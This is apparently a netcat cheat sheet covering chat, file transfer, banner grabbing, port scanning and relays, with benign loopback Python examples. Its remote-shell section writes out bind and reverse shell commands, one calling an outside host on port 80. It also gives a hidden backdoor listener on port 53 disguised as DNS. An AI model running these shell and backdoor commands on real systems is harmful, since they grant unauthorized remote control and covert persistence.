Netcat

Updated: April 27, 2024

Netcat (nc) reads and writes raw TCP and UDP connections from the command line. The same binary works as a chat link, file mover, banner grabber, port scanner, relay and, where the -e option was compiled in, a remote shell. Several implementations exist (the original nc 1.10, OpenBSD nc, nmap's ncat, the Windows port) and their option letters differ slightly; the notes below follow the traditional flags and mark the exceptions.


NETCAT || ACTIVATE LISTENER FIRST THEN CLIENT

nc
  -g, --gateway=LIST   # loose source-routing hop list (up to 8 hops): force data through a chosen path. Most routers drop source-routed packets today.
  -G, --pointer=NUM    # source-routing pointer into the -g list (4, 8, 12, ...), for troubleshooting a route
  -o, --output=FILE    # hex dump of all traffic in both directions to FILE; when nc is used as a relay this records everything that passed through (a simple man-in-the-middle sniffer)
  -s, --source=ADDRESS # local source address to bind; must be an address the host actually owns

Messenger (unencrypted: anything typed at either end crosses the wire in cleartext)

nc -l -p 31337    # listener: wait for one inbound connection on TCP 31337
    -l    # listen mode for inbound connections
    -L    # Windows build only: listen "harder", re-open the listener when the client disconnects
    -p    # local port. Traditional nc needs -l -p PORT; OpenBSD nc and ncat take the port directly (nc -l 31337)

nc 10.73.31.145 31337   # client: connect to the listener; whatever is typed on one side appears on the other

File Transfer (better to just use rsync+ssh or scp: netcat gives no encryption, no authentication and no integrity check, so compare sha256sum output on both sides afterwards)

nc -v -w 30 -l -p 31337 < technolust.txt    # listener: serves the file to the first client that connects, then exits
    -v, --verbose   # show details as things go (-vv for more)
    -w    # timeout in seconds for the connect and for the final reads; the listener gives up after n idle seconds

nc -v -w 2 10.72.31.179 31337 > technolust.txt    # client: receive the file; nc exits when the sender closes the connection
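The listener/client transfer above, as an added example that is not part of the original page or of netcat: the same two roles done with Python sockets, plus the integrity check nc itself never performs. The "remote host" is a constructed random file served over 127.0.0.1, and the function and file names are this example's own.

```python
"""Netcat-style file transfer (listener serves the file, client saves it) in plain
Python sockets, plus the check nc never gives you: SHA-256 on both ends.
Added example for this page, not netcat code.  The "remote host" is a
constructed temp file served on 127.0.0.1, so it runs offline."""
import hashlib
import os
import socket
import tempfile
import threading


def sha256_of(path):
    """Same result as `sha256sum FILE` on either side of a real transfer."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def serve_file(path, host="127.0.0.1"):
    """Listener side (nc -l -p PORT < FILE): serve the file to the first client,
    then exit.  Runs in the background; returns the chosen port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))              # port 0: let the OS pick a free port
    srv.listen(1)

    def once():
        conn, _ = srv.accept()
        with conn, open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                conn.sendall(chunk)
            conn.shutdown(socket.SHUT_WR)   # FIN = "that was the whole file"; nc relies on the same EOF
        srv.close()

    threading.Thread(target=once, daemon=True).start()
    return srv.getsockname()[1]


def fetch_file(host, port, dest, timeout=5.0):
    """Client side (nc HOST PORT > FILE): read until the peer closes, then hash the result."""
    with socket.create_connection((host, port), timeout=timeout) as s, open(dest, "wb") as out:
        while True:
            data = s.recv(65536)
            if not data:             # EOF: the sender closed its write side
                break
            out.write(data)
    return sha256_of(dest)


def transfer_and_verify(src, dest):
    """Both halves on loopback; returns (hashes match, expected hash, actual hash)."""
    expected = sha256_of(src)
    port = serve_file(src)
    actual = fetch_file("127.0.0.1", port, dest)
    return actual == expected, expected, actual


def demo(size=300_000):
    """Constructed input: a random file in a temp dir.  Returns
    (clean copy verified, truncated copy detected)."""
    d = tempfile.mkdtemp()
    src, dest = os.path.join(d, "technolust.txt"), os.path.join(d, "technolust.copy")
    with open(src, "wb") as f:
        f.write(os.urandom(size))
    ok, expected, _ = transfer_and_verify(src, dest)
    # A dropped connection leaves a shorter file that looks fine to nc; the hash catches it.
    with open(dest, "r+b") as f:
        f.truncate(size - 1)
    truncated_detected = sha256_of(dest) != expected
    return ok, truncated_detected


if __name__ == "__main__":
    print(demo())   # (True, True)
```

The sender's shutdown(SHUT_WR) is the only "end of file" signal the receiver gets; a connection that dies halfway produces a shorter file with no error on either side, which is why the hash comparison is worth the extra command.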

Banner Grabbing

Netcat passes the stream through untouched, but it is not stealthy: every connection completes a full TCP handshake and shows up in the remote service's logs like any other client. Connect to a port, send a request (or just press Enter) and read what the service says about itself:

nc <router-ip> <port>
nc 192.168.0.1 81        # an embedded web server answers with its status line, e.g. HTTP/1.1 200
nc 192.168.0.1 22        # an SSH server sends its version banner (SSH-2.0-...) before anything is typed
nc www.google.com 80     # type the request below, then press Enter twice (HTTP/1.1 requires a Host header)
GET / HTTP/1.1
Host: www.google.com

Port Scanning

nc -v -z -w 1 192.168.0.9 1-1000    # TCP connect scan of ports 1-1000; -v reports each port that accepts a connection
    -z    # zero-I/O mode: connect, report, close, send nothing
    -u    # scan UDP instead of TCP (slow and unreliable: a UDP port only shows as closed when an ICMP port-unreachable comes back)
    -n    # numeric only, no DNS; avoids reverse-lookup queries that leave a trace in resolver logs
    (TCP is the default; in traditional nc -t means "answer TELNET negotiation", not TCP)

A connect scan finishes the handshake, so every probed service that logs connections will log this one.

printf 'GET / HTTP/1.0\r\n\r\n' | nc host.example.com 80    # pull the homepage; printf rather than echo -n, because echo does not interpret \r\n in every shell
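The connect scan and the banner grab from the two sections above, as an added example that is not part of the original page or of netcat: what `nc -v -z -w 1` and `printf ... | nc HOST 80` do, written out with Python sockets so the mechanics (handshake only for -z, request then read-until-close for the grab) are visible. The target is a constructed HTTP-like server on 127.0.0.1; the function names are this example's own.

```python
"""Connect scan and banner grab, the way ``nc -v -z -w 1 HOST 1-1000`` and
``printf 'GET / HTTP/1.0\\r\\n\\r\\n' | nc HOST 80`` do it, in plain Python sockets.
Added example for this page, not netcat code.  A constructed HTTP-like server on
127.0.0.1 stands in for the target so it runs offline."""
import socket
import threading


def start_target(host="127.0.0.1"):
    """Constructed target: answers every connection with an HTTP/1.0 banner.
    Returns (port, stop function)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))          # port 0: let the OS pick a free port
    srv.listen(16)
    srv.settimeout(0.2)          # so the accept loop can notice the stop flag
    stop = threading.Event()

    def loop():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                conn.settimeout(1)
                try:
                    conn.recv(1024)              # the request, or EOF from a -z style probe
                    conn.sendall(b"HTTP/1.0 200 OK\r\nServer: demo\r\n\r\nhello")
                except OSError:
                    pass                         # probe already hung up
        srv.close()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1], stop.set


def scan(host, ports, timeout=1.0):
    """nc -z -w 1 equivalent: a port is open if the TCP handshake completes.
    Nothing is sent, but the target's accept() still fires, so it is not silent."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except (OSError, OverflowError):     # refused, filtered (timeout) or bad port number
                continue
            open_ports.append(port)
    return open_ports


def grab_banner(host, port, request=b"GET / HTTP/1.0\r\n\r\n", timeout=2.0):
    """printf REQUEST | nc HOST PORT equivalent: send, then read until close or timeout."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass                                 # service kept the connection open; keep what we have
    return b"".join(chunks)


def status_line(banner):
    """First line of the reply, which is all a quick banner grab usually needs."""
    return banner.split(b"\r\n", 1)[0].decode("ascii", "replace")


if __name__ == "__main__":
    port, stop = start_target()
    print("open:", scan("127.0.0.1", range(port - 2, port + 3)))
    print(status_line(grab_banner("127.0.0.1", port)))
    stop()
```

The timeout in scan() is the -w 1 of the nc command: a filtered port (no SYN-ACK, no RST) only reports as closed when that timer expires, which is why a scan of a firewalled host takes about one second per port.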

Remote Shell

-e hands the connection to a program: its stdin/stdout/stderr become the socket. Only builds compiled with it have the option (traditional nc built with GAPING_SECURITY_HOLE, the Windows port, and ncat); OpenBSD nc has no -e.

# WINDOWS
nc -Lp 31337 -vv -e cmd.exe   # bind shell: listener on the Windows box hands cmd.exe to whoever connects
nc [ipofwindowsmachine] 31337   # client gets the command prompt

nc hak5.wifipinnaple.com 80 -e cmd.exe    # reverse shell: the Windows box connects out to a listener on port 80 (outbound 80 is rarely filtered), so it works from behind NAT
_________________________________________________________________________
# LINUX
nc -lp 31337 -e /bin/zsh    # bind shell on the Linux box (use /bin/sh if zsh is not installed)
nc [ipoflinuxmachine] 31337   # client

Ghost in the wires (backdoor)
nc -l -p 53 -e /bin/sh &    # background listener on port 53 (passes for DNS at a glance). The shell runs with the privileges of whoever started nc: root access only if it was started as root

CRYPTCAT (netcat with Twofish encryption of the stream; both sides must give the same -k key, and the listener starts first)

cryptcat -k password -l -p 1337                 # listener
cryptcat -k password [ipofotherperson] 1337     # client

Talk to processes (moving a directory of pictures from a Linux to a Windows machine)

tar -cf - Pictures | nc -l -p 1337      # listener (linux): stream a tar archive of Pictures to the first client
nc [ipoflinuxmachine] 1337 | tar -xf -  # client (windows, needs a tar.exe in PATH): unpack the archive as it arrives

cat web.jpg | nc -l -p 1337             # listener (linux): serve a single file
nc [ipoflinuxmachine] 1337 > web.jpg    # client: save it

Piping (relay)

nc -l -p 1337 | nc www.google.com 80 | nc -l -p 1338    # one-way relay: whatever arrives on 1337 is forwarded to www.google.com:80, and the reply is served to whoever connects to 1338. The reply cannot travel back over the first connection, because a pipe only carries data one way; a two-way relay needs a named pipe (next section). Add -o FILE to the middle nc to record the traffic.

mknod /tmp/backpipe p   # create a named pipe (FIFO) called backpipe (mkfifo /tmp/backpipe does the same). A FIFO lets nc's output be fed back into a program's stdin, which gives a two-way link; needed for anything interactive.
frotz ~/zork/DATA/ZORK1.DAT    # the interpreter on its own runs Zork locally
frotz ~/zork/DATA/ZORK1.DAT 0</tmp/backpipe | nc -l -p 1337 1>/tmp/backpipe   # listener: frotz reads commands from the FIFO, its output is piped to nc, and nc writes what the client types into the FIFO
nc [ipwherezorkrunning] 1337    # client: plays Zork over the network
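The one-way pipe chain and the named-pipe trick from the two sections above, as an added example that is not part of the original page or of netcat: a two-way TCP relay in Python that carries both directions (what the FIFO buys you) and writes a hex dump of everything that passes (what -o records). The "target" is a constructed echo-in-upper-case server on 127.0.0.1; the function names are this example's own.

```python
"""Two-way relay with a hex dump of everything that passes, i.e. what the
``nc -l -p 1337 | nc HOST 80`` chain plus the named-pipe trick achieve, and what
``-o FILE`` records.  Added example for this page, not netcat code.  The
target is a constructed upper-casing echo server on 127.0.0.1 so it runs offline."""
import socket
import threading


def hexdump(direction, data):
    """One line per 16 bytes, in the spirit of nc -o: '>' client->target, '<' target->client."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{direction} {off:08x} {hexpart:<47} {asc}")
    return lines


def _pump(src, dst, direction, log):
    """Copy bytes one way until EOF, logging each chunk; then half-close the other side."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            log.extend(hexdump(direction, data))
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)   # pass the EOF on, so the peer sees the close too
        except OSError:
            pass


def start_relay(target_host, target_port, listen_host="127.0.0.1"):
    """Listen on an ephemeral port; for the first client, connect to the target and
    pump both directions at once.  Returns (port, dump lines, done event)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((listen_host, 0))
    srv.listen(1)
    log, done = [], threading.Event()

    def run():
        client, _ = srv.accept()
        srv.close()
        with client, socket.create_connection((target_host, target_port)) as target:
            back = threading.Thread(target=_pump, args=(target, client, "<", log))
            back.start()                              # target -> client, the direction a plain pipe cannot carry
            _pump(client, target, ">", log)           # client -> target
            back.join()
        done.set()

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1], log, done


def start_echo_target(host="127.0.0.1"):
    """Constructed stand-in for the real service: replies to each chunk in upper case."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data.upper())

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


def demo(message=b"hello relay\n"):
    """Client -> relay -> target and back; returns (reply seen by client, captured dump)."""
    tport = start_echo_target()
    rport, log, done = start_relay("127.0.0.1", tport)
    with socket.create_connection(("127.0.0.1", rport)) as c:
        c.sendall(message)
        c.shutdown(socket.SHUT_WR)
        reply = b""
        while True:
            data = c.recv(4096)
            if not data:
                break
            reply += data
    done.wait(5)
    return reply, log


if __name__ == "__main__":
    reply, log = demo()
    print(reply)
    print("\n".join(log))
```

The two _pump threads are the Python equivalent of the FIFO wiring: one carries the client's bytes to the target, the other carries the target's bytes back, and each half-closes its output when it sees EOF so a close on either end propagates through the relay instead of leaving a hung connection.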